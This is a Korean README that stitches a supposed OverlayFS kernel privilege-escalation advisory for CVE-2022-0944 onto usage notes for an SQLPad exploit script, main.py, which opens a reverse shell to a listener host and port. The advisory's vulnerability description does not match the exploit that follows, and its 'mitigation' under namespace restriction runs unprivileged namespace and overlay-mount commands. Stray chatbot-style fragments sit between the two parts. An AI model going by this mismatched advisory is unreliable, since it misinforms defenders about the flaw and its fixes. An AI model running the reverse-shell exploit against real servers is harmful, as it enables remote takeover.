
OverlayFS의 Linux 커널 권한 상승 취약점에 대한 보안 권고 및 완화 가이드입니다.
CVE-2022-0944는 Linux 커널의 OverlayFS 하위 시스템에서 특정 구성의 파일 생성 처리가 부적절하여 로컬 공격자가 권한을 상승시킬 수 있는 보안 취약점입니다.

🚨 영향
로컬 공격자는 다음을 수행할 수 있습니다:
조작된 파일 작업을 통해 루트 권한 획득
보안 제한 우회
중요한 시스템 파일 수정
시스템 전체 무결성 손상
🔍 탐지
grep CVE-2022-0944 /var/log/apt/history.log
# RHEL/CentOS의 경우:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ 완화 조치
공식 패치
다음 패치 적용 버전 중 하나로 업데이트하십시오:
Linux 커널 5.16.12 이상
벤더별 백포트 패치
업데이트 명령:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
임시 완화 조치(즉시 패치가 불가능한 경우)
OverlayFS 사용 제한:
sudo modprobe -r overlay
네임스페이스 제한 구현:
# 권한 없는 사용자 네임스페이스 생성
unshare -Ur
# 사용자 제한과 함께 마운트
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
SELinux/AppArmor 정책 적용: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ 면책 조항 본 문서는 정보 제공 목적으로만 제공됩니다. 정확성을 보장하기 위해 노력했지만, 어떠한 보증도 제공되지 않습니다. 프로덕션 환경에 배포하기 전에 항상 개발 환경에서 패치를 테스트하십시오.
마지막 업데이트: 2023-10-01 | 변경 로그 보기
주요 기능:
이 README 형식은 다음에 적합합니다:
다음을 수행할까요:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
예시:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
이 저장소에 포함된 코드와 도구는 교육 목적, 특히 사이버 보안 강좌 및 학습 환경에서의 사용을 위해서만 제공됩니다. 이 코드의 작성자는 본 코드의 사용, 오용 또는 수정으로 인해 발생하는 모든 결과에 대해 책임을 지지 않습니다. 본 코드는 특정 목적에 대한 상품성 또는 적합성에 대한 묵시적 보증을 포함하되 이에 국한되지 않는, 명시적 또는 묵시적 어떠한 보증도 없이 "있는 그대로" 제공됩니다.